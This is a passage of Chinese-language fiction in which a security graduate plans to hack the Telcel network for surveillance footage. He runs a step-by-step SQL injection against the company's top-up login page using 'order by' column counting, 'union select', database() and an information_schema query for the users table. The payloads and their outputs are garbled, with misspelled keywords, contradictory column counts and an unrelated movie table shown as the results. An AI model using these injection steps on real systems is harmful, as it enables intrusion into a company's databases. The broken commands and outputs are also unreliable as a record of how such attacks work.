王濤是網絡安全專業的畢業生。

首先想到的就是利用網絡查詢。

通過路口的監控攝像頭確定綁匪的活動軌跡。

墨西哥城警務係統采用的是Telcel電信公司的數據網絡。

入侵Telcel機房，內網滲透，目錄遍曆。

找到監控攝像頭數據。

王濤離開酒店。

在沒有監控的街角，買了20部Telcel的預充值手機。

回到酒店。

打開自己的筆記本電腦。

啟動VMware Workstation虛擬機。

查詢到Telcel官方網站。

點擊頁麵的充值鏈接。

登錄采用的是短信驗證功能。

在登錄界麵輸入’。

頁麵提示 “near \u0027%\u0027\u0027 at line 1”。

充值數據庫存在注入漏洞。

查詢數據庫的字段。

’order by 12# 顯示Error: Unknown column \u002712\u0027 in \u0027order clause\u0027

第12行沒有漏洞。

繼續測試。

’order by 11# 顯示Error: Unknown column \u002711\u0027 in \u0027order clause\u0027

第11行也沒有漏洞。

繼續測試到第9行的時候發現了漏洞。

\u0027 order by 7 #

Tile Relese Chaacter Gere qwas

World War Z Gery Lne horr asxz

The Drk Kight Ries Buce Wyne action asxz

The Amazing Spider-Man Peter Paker action asxz

The Inredible Hulk Brce Banner acton asxz

The Fst ad the Furious Brian O\u0027Connor actin asxz

Iron Mn Toy Strk actin asxz

Ma of Stel Clrk Ket acion asxz

G.I. Je: Retlition Cora Commnder acton asxz

Termnator Salation Jhn Conor si-fi asxz

6個字段

繼續查詢可顯示的字段數。

-1\u0027 union select 1,2,3,4,5,6,7 #

Tile Relase Carater Gere Ib

2 3 5 4 Lnk

2，3，4，5 為可顯示字段

爆破數據庫。

1\u0027 unon seect 1,daabse(),3,4,5,6,7 #

Tile Reease Chaacter Gnre IMb

3 2 3 5 4 Lik 沒有爆出數據庫

1\u0027 unon selet 1,dtabase(),3,4,5,6,7 #

Ttle Relse Chracer Gre IMb

qwas 3 5 4 Lik

庫名：qwas

爆破數據庫的關鍵內容。

-1\u0027 unon selct 1,colmn_nme,3,4,5,6,7 fom infrmation_shema.colums whee tble_scema\u003ddataase() nd tale_nme\u003d\u0027usrs\u0027#